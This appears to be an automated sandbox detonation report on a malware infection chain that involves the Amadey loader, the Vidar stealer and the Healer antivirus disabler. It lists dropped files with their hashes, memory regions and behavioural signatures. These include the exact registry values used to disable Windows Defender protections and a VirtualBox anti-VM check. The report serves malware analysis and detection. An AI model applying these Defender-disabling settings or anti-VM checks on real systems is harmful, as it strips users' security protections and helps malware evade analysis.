memory/2520-0-0x0000000000E00000-0x00000000012C9000-memory.dmp
memory/2520-1-0x0000000077A90000-0x0000000077A92000-memory.dmp
memory/2520-2-0x0000000000E01000-0x0000000000E69000-memory.dmp
memory/2520-3-0x0000000000E00000-0x00000000012C9000-memory.dmp
memory/2520-5-0x0000000000E00000-0x00000000012C9000-memory.dmp
memory/2520-16-0x0000000006940000-0x0000000006E09000-memory.dmp
memory/2520-21-0x0000000000E01000-0x0000000000E69000-memory.dmp
\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
| MD5 | 78ec3bb0db3cee811be50f99dd89e2fe |
| SHA1 | 1ec0122be4458914a8b07c7b0bf34faf47d14c19 |
| SHA256 | f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5 |
| SHA512 | d36b32948ad76a558bbb3dbcbbdfeb911f581ab59b4a7502c09e5b4479b0fe9976cd473870f7dd7717da5c2639817c9990388d39f42e712410533b04893da082 |
memory/2520-20-0x0000000000E00000-0x00000000012C9000-memory.dmp
memory/2716-22-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2520-18-0x0000000006940000-0x0000000006E09000-memory.dmp
memory/2716-23-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-24-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-27-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-26-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-28-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-29-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-30-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-31-0x0000000000C50000-0x0000000001119000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
| MD5 | 515748a93ce7beb3f4416ec66ba8488e |
| SHA1 | 3ba2f1a56dcc91967361622c56b1ba545cda4325 |
| SHA256 | a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6 |
| SHA512 | 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb |
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
| MD5 | 896dc9ae02a4b0cf429b4346a3990fae |
| SHA1 | 17f297bb4cf3acd07078fc5d73c1d6564a8c0710 |
| SHA256 | 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2 |
| SHA512 | e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c |
memory/2940-61-0x000000013FF20000-0x00000001403DB000-memory.dmp
memory/1740-62-0x00000000011E0000-0x0000000001290000-memory.dmp
memory/2820-78-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-73-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-71-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-69-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-67-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-65-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-76-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-75-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2716-82-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-83-0x0000000000C50000-0x0000000001119000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
| MD5 | 87da0483aefde76a5086c5b2ea14304f |
| SHA1 | ae6b27aeaf487666c71b26397709004e65b09002 |
| SHA256 | 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f |
| SHA512 | ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4 |
memory/2996-98-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2716-97-0x0000000006AB0000-0x0000000006F1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab36BC.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar36CE.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 85161b67da1a3df1f9d35b48d05dfcd1 |
| SHA1 | c61740cf82fa55a77f3d2fe8f0fc7cb1fa9d0ddf |
| SHA256 | d97f42f4b1dbdaf9afdded0834b6aa07d795f4f38827c07faa5503f1873059b7 |
| SHA512 | 78b7f5e8f462b2e49de2338c0f29238a99c785286f230dc8176b89d2f78916b2a42aa497c0d42a0d047ea404e6bff0ba50ee8dabb8fb9ffc38bfc64ae7e21f4f |
C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
| MD5 | 5b0bf9144e2661027c1621957b1ef278 |
| SHA1 | 589efc0736ecc18d94e4dd8d353502e8d76738c4 |
| SHA256 | a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f |
| SHA512 | e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177 |
C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta
| MD5 | 6a3a2756387d1c8e5ec150c2f910e488 |
| SHA1 | be8a023493cfce056e8cfd884498984c26be48bd |
| SHA256 | 60b7dc972da88caf9e242c773088e1df29aa3d9fa2f52049c2cf1441aad6363a |
| SHA512 | 9778be38d5e30700fc56cf6092972fe8a19b024ab81078924055c1cbf662acc7f003cb2253788ec67f022ff33d0fd66aead8c75f8125e5f830cc989fae470659 |
C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA1 | efab18a8e2a33593049775958b05b95b0bb7d8e4 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
| SHA512 | be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74 |
\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
| MD5 | 03a574d64f0e62c5e117a5f5acf137e4 |
| SHA1 | 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90 |
| SHA256 | dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747 |
| SHA512 | d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1 |
memory/1756-260-0x0000000006440000-0x0000000006892000-memory.dmp
memory/2944-259-0x0000000000900000-0x0000000000D52000-memory.dmp
memory/1756-258-0x0000000006440000-0x0000000006892000-memory.dmp
memory/2716-257-0x0000000006AB0000-0x0000000006F1A000-memory.dmp
memory/2944-280-0x0000000000900000-0x0000000000D52000-memory.dmp
memory/2944-279-0x0000000000900000-0x0000000000D52000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\30SMFKX3Q831TJGZG868.temp
| MD5 | 54200432a451e4fa263abc6274ceeb41 |
| SHA1 | f65f6532098388e91c209baec0ceccf9e6d36808 |
| SHA256 | 18ab5c4567b7f0a1b0e658a30139ccdc2cbc7d2b2376cc4837b435d0520de293 |
| SHA512 | addc696c78ee97b088ebcbaaf2ebfbb7994198856959b175de25f042d1de89f7e01b431a9e80f1cc878272292c78f114e5c6dd56401b0647915cb005ffd2c661 |
memory/2996-307-0x0000000000400000-0x000000000086A000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Temp\hWO8LyeS1.hta
| MD5 | 16d76e35baeb05bc069a12dce9da83f9 |
| SHA1 | f419fd74265369666595c7ce7823ef75b40b2768 |
| SHA256 | 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7 |
| SHA512 | 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e |
memory/2716-324-0x0000000000C50000-0x0000000001119000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
memory/2996-361-0x0000000000400000-0x000000000086A000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
| MD5 | 41e7a544f14c8eeda7675b6f8fc2f267 |
| SHA1 | 98585d0462f44ace4216e00c0ae33f7b3606e0d4 |
| SHA256 | b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843 |
| SHA512 | 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef |
memory/2716-428-0x0000000006AB0000-0x0000000006DDE000-memory.dmp
memory/1644-429-0x0000000000920000-0x0000000000C4E000-memory.dmp
memory/2716-427-0x0000000006AB0000-0x0000000006DDE000-memory.dmp
\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
| MD5 | d433e1dc943e6ea29d67cf72d2f6fecd |
| SHA1 | 9964aa3e596d93673c4d84695dc94d6f1a9766cd |
| SHA256 | a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5 |
| SHA512 | caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43 |
memory/628-467-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/1644-465-0x0000000000920000-0x0000000000C4E000-memory.dmp
memory/2056-478-0x00000000010C0000-0x00000000013E0000-memory.dmp
memory/2780-451-0x0000000006570000-0x0000000006890000-memory.dmp
memory/2056-450-0x00000000010C0000-0x00000000013E0000-memory.dmp
memory/2780-449-0x0000000006570000-0x0000000006890000-memory.dmp
memory/2944-502-0x0000000000900000-0x0000000000D52000-memory.dmp
memory/2716-545-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2996-567-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2716-589-0x0000000006AB0000-0x0000000006DDE000-memory.dmp
memory/2716-588-0x0000000006AB0000-0x0000000006DDE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
| MD5 | 49a690607e1d76e6970b724c4fd22ec7 |
| SHA1 | 4b670fc77c181e9afb3986729ee3b585bc460c3f |
| SHA256 | 0d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7 |
| SHA512 | 54ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b |
memory/2912-625-0x0000000000A10000-0x0000000000D0F000-memory.dmp
memory/2716-626-0x0000000006AB0000-0x0000000006DAF000-memory.dmp
memory/2716-624-0x0000000006AB0000-0x0000000006DAF000-memory.dmp
memory/2912-651-0x0000000000A10000-0x0000000000D0F000-memory.dmp
memory/628-650-0x0000000000FF0000-0x000000000131E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091742001\022606d6b2.exe
| MD5 | 1b7c22a214949975556626d7217e9a39 |
| SHA1 | d01c97e2944166ed23e47e4a62ff471ab8fa031f |
| SHA256 | 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 |
| SHA512 | ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5 |
C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
| MD5 | 03b33bee015493080376b643025fdf86 |
| SHA1 | bdadfa2adfc6d9c5413bcb2ac1d3b1918fb95bfd |
| SHA256 | 4acb822963132fd6bce9c8a61b8aa3d5015aadfd268717c1bf1c84ed3a8c809b |
| SHA512 | 6e758f621d5fd1d041e926b6bd607e670329def72e8b9ffb940e28a7ed77212f8e6a6eabf7d15e912ae842a990ebf6fc65779f64307fb86993fcd97790eeccf9 |
memory/628-702-0x0000000000FF0000-0x000000000131E000-memory.dmp
\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
| MD5 | 9d6f03d5a83f9ab0de52c69257720122 |
| SHA1 | 407ce825de553f856059543cb20c2002f4b2b87d |
| SHA256 | ab2c3bb1cf80ccd63b4e1be5b2aef4564542465e90f14e5110775658c6b7b9c6 |
| SHA512 | d937cb2599dd9a245e186a3f3d0efb786f9fbf5084c14878448f7454f175dc076d9af526a0f5ae24f75370247c70ae6e4f310d6d610f6ed4fdb2877b9c9468db |
memory/628-714-0x0000000006B50000-0x0000000006FB0000-memory.dmp
memory/1804-713-0x0000000000400000-0x0000000000860000-memory.dmp
memory/628-712-0x0000000006B50000-0x0000000006FB0000-memory.dmp
memory/2716-719-0x0000000006AB0000-0x0000000006DAF000-memory.dmp
memory/2716-718-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2996-720-0x0000000000400000-0x000000000086A000-memory.dmp
memory/628-721-0x0000000006B50000-0x0000000006FB0000-memory.dmp
memory/1804-723-0x0000000000400000-0x0000000000860000-memory.dmp
memory/628-722-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/1804-724-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2716-743-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2996-744-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2996-784-0x0000000000400000-0x000000000086A000-memory.dmp
memory/628-785-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/1804-786-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2708-790-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2716-789-0x0000000000C50000-0x0000000001119000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | 5c7477b9c5f004c96d905ca251c16b58 |
| SHA1 | a1d57d7f2e0dcc6140d6d7a79ad0da59c544c11e |
| SHA256 | 85739875bdfaddd24be15a1046457e17cac757441804c627214973e8456a4b8e |
| SHA512 | fa91684c3360c99a24875f2e29f566fea2b2743f749a4c6e4ca6942b967b7dd37013646359f4083affc004b3db915756b7a166f22628397eeb4fec98e8ee2753 |
memory/628-792-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/1804-793-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2708-796-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2708-795-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2716-794-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/628-797-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/1804-798-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2716-799-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2708-800-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe
| MD5 | cf6bd1302ab35c1275fedadbabde12fa |
| SHA1 | 0b8f58dd6cc533ae2ac26abf9eac849962cbfeb1 |
| SHA256 | 14738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7 |
| SHA512 | c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04 |
memory/628-815-0x0000000000FF0000-0x000000000131E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe
| MD5 | 639af76cb7333cbd609da5d52a6e195b |
| SHA1 | a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483 |
| SHA256 | a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8 |
| SHA512 | 67510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51 |
memory/1804-829-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2716-830-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2708-831-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2880-832-0x00000000009C0000-0x0000000001604000-memory.dmp
memory/2264-833-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2264-835-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2880-834-0x00000000009C0000-0x0000000001604000-memory.dmp
memory/2264-839-0x0000000010000000-0x000000001001C000-memory.dmp
memory/628-844-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/2652-845-0x0000000000E10000-0x0000000001848000-memory.dmp
memory/1548-848-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2652-847-0x0000000000E10000-0x0000000001848000-memory.dmp
memory/1804-850-0x0000000000400000-0x0000000000860000-memory.dmp
memory/1804-851-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\success[2].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/2716-853-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2708-854-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe
| MD5 | db3632ef37d9e27dfa2fd76f320540ca |
| SHA1 | f894b26a6910e1eb53b1891c651754a2b28ddd86 |
| SHA256 | 0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d |
| SHA512 | 4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd |
C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe
| MD5 | f071beebff0bcff843395dc61a8d53c8 |
| SHA1 | 82444a2bba58b07cb8e74a28b4b0f715500749b2 |
| SHA256 | 0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec |
| SHA512 | 1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d |
memory/2468-915-0x0000000001320000-0x00000000013D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe
| MD5 | 69de9fb1f2c4da9f83d1e076bc539e4f |
| SHA1 | 22ce94c12e53a16766adf3d5be90a62790009896 |
| SHA256 | 0df459c85df5ee90a32edcecd4c0519c00fcf9315b9a24edc132d8cf0f6c7ef8 |
| SHA512 | e9f2da39ecbb583943ae618097469e5d82953712b6cfdfa4b58fa4dcc2f683a7049aca4141b897ff1f6ab94d7bbaf21c7dec2e243c8632d46a55e15c363a9733 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-24 13:38
Reported
2025-02-24 13:41
Platform
win10v2004-20250217-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
